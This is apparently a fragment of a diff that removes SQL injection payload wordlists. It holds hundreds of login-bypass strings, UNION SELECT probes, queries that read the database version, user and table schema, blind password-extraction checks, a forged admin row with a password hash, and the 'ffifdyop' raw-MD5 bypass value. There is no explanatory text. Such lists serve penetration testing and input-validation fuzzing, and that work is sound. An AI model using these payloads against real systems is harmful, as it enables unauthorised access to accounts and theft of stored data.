')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
